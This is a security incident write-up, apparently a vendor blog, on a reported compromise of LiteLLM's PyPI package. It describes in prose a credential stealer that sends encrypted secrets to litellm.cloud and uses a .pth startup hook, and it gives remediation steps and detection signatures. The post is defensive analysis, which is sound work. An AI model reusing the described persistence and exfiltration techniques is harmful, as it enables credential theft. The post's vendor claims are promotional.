What Happened
On March 24, 2026, an attacker compromised the PyPI maintainer account for LiteLLM — the widely-used Python library that provides a unified interface to 100+ LLM providers. Two malicious versions were published: v1.82.7 and v1.82.8.
LiteLLM is a core dependency for agent frameworks including CrewAI, DSPy, and countless custom AI agent deployments. Any system that pulled a fresh install or upgrade in the attack window received the compromised package.
The LiteLLM team has engaged Google Mandiant for incident response. The malicious packages have been removed from PyPI. All maintainer accounts have been rotated.
The Payload: What It Stole
The credential stealer was comprehensive. It harvested:
- Environment variables — API keys for OpenAI, Anthropic, Azure, AWS, every LLM provider configured
- SSH keys — private keys from
~/.ssh/ - Cloud credentials — AWS, GCP, Azure, and Kubernetes configs
- Crypto wallets — seed phrases and private keys
- Database passwords — from config files and env vars
- SSL private keys
- Shell history —
.bash_history,.zsh_history - CI/CD configs — GitHub Actions secrets, Jenkins credentials
The stolen data was encrypted with AES-256-CBC + RSA-4096 and exfiltrated via HTTPS POST to litellm.cloud — a domain registered just hours before the attack. The encryption made the exfiltration traffic appear benign to network monitors.
The Persistence Mechanism
Version 1.82.8 introduced a particularly dangerous escalation: a .pth file that Python executes automatically on startup.
This means the credential stealer didn't require an explicit import litellm. Any Python process — a Jupyter notebook, a Flask server, a cron job, a different AI agent entirely — would trigger the payload simply by starting Python in an environment where the compromised package was installed.
This is the difference between a malicious library (runs when imported) and a malicious environment (runs when Python starts). The attack surface expanded from "code that uses LiteLLM" to "any Python code running on the same machine."
Why AI Agent Deployments Are Uniquely Vulnerable
This attack hit the AI agent ecosystem harder than a typical PyPI compromise for three structural reasons:
1. AI agents store secrets in environment variables
The standard pattern for configuring AI agents is environment variables: OPENAI_API_KEY, ANTHROPIC_API_KEY, AZURE_OPENAI_KEY. LiteLLM's own documentation instructs users to set API keys this way. The payload was designed to harvest exactly these variables because that's where the money is.
2. Transitive dependencies are invisible
Many teams don't use LiteLLM directly. They use CrewAI, DSPy, or custom frameworks that depend on LiteLLM. A pip install crewai pulls LiteLLM as a transitive dependency. The developer who ran the install may never have seen LiteLLM in their requirements file — but it was there, and it was compromised.
3. Auto-upgrade in CI/CD pipelines
Production deployments that use pip install litellm without version pinning (or with >=1.82.0) automatically pulled the malicious version on their next build. CI/CD pipelines that build fresh environments on every deploy were especially exposed — every build in the attack window installed the compromised package.
The Pattern: This Keeps Happening
LiteLLM is not an isolated incident. It's the latest in an accelerating series of supply chain attacks targeting AI developer tooling:
| Date | Incident | Impact |
|---|---|---|
| Mar 19, 2026 | Trivy GitHub Action compromised | 12,000+ CI/CD pipelines, API keys stolen from memory |
| Mar 21, 2026 | Cargo CVE-2026-33056 | Build-time code execution in Rust MCP servers |
| Mar 24, 2026 | LiteLLM PyPI hijack (this incident) | All environments with compromised package, auto-execute on Python start |
Three supply chain attacks on AI developer tools in six days. The attackers aren't targeting the models — they're targeting the scaffolding. Package managers, CI/CD tools, and dependency chains are where the credentials live and where the defenses are weakest.
What to Do Right Now
If you installed LiteLLM in the last 48 hours:
- Check your installed version:
pip show litellm— if it shows 1.82.7 or 1.82.8, you were affected - Rotate ALL credentials immediately: Every API key, SSH key, cloud credential, and database password on the affected machine should be considered compromised
- Check for
.pthfiles: Look in your Pythonsite-packagesdirectory for any unexpected.pthfiles that weren't there before - Audit your CI/CD pipelines: Check build logs for
litellm==1.82.7orlitellm==1.82.8in any recent deployment - Update to a clean version:
pip install litellm==1.82.6(last known-good version)
If you use LiteLLM as a transitive dependency:
- Check your lockfile: Search
requirements.txt,poetry.lock, orPipfile.lockforlitellmand verify the version - Pin your dependencies: If you're using
litellm>=1.80, change tolitellm==1.82.6(exact version pin) - Audit frameworks that depend on LiteLLM: CrewAI, DSPy, and other agent frameworks may pull it transitively
The Structural Problem: Scanning Happens Too Late
The LiteLLM attack exposes a gap in how AI agent deployments handle dependency security. Most teams' security posture looks like this:
- Developer runs
pip install - Package installs and (in this case) immediately executes
- Sometime later, maybe, someone runs a vulnerability scan
The credential theft happened at step 2. The scan at step 3 is too late — the data is already exfiltrated.
SkillShield's model inverts this: scan the dependency before it's installed, not after. For AI agent skills and MCP servers, SkillShield checks:
- Known malicious packages against a continuously updated threat database
- Suspicious dependency patterns — typosquatting, version manipulation, post-install hooks
- Permission scope — does this package need to read environment variables? Does it need network access to domains outside its stated function?
- Behavioral signatures — credential harvesting patterns, data encoding before transmission, connections to newly-registered domains
A LiteLLM package that reads all environment variables, encrypts them, and POSTs them to a domain registered the same day would trigger multiple CRITICAL findings in a SkillShield scan before installation.
Stop Storing Secrets in Environment Variables
The LiteLLM attack worked because API keys were stored as environment variables — readable by any process in the same environment. This is the default configuration for nearly every AI agent framework.
Better alternatives:
- Secrets managers: AWS Secrets Manager, HashiCorp Vault, 1Password Connect — secrets are fetched at runtime with scoped access, not baked into the environment
- Short-lived tokens: Instead of long-lived API keys, use OIDC tokens or session-based credentials that expire
- Encrypted key sharing: When you must share an API key, use encrypted, time-bounded sharing rather than pasting it into a
.envfile
If the LiteLLM victim had used a secrets manager with scoped access, the payload would have found empty environment variables instead of production credentials.
Key Takeaways
- LiteLLM v1.82.7 and v1.82.8 were compromised — credential stealer that activated on Python startup, no import required
- AI agent deployments are structurally vulnerable — env-var secrets, transitive dependencies, auto-upgrade in CI/CD
- Three supply chain attacks on AI tools in six days (Trivy, Cargo, LiteLLM) — this is a pattern, not an anomaly
- Pre-install scanning is the only defense that works — post-install scans happen after the data is already stolen
- Stop storing secrets in environment variables — use secrets managers with scoped, short-lived access
Sources: LiteLLM GitHub Issue #24518 (primary technical timeline), Hacker News discussion (703 points, 435 comments), Google Mandiant engagement confirmed by LiteLLM team.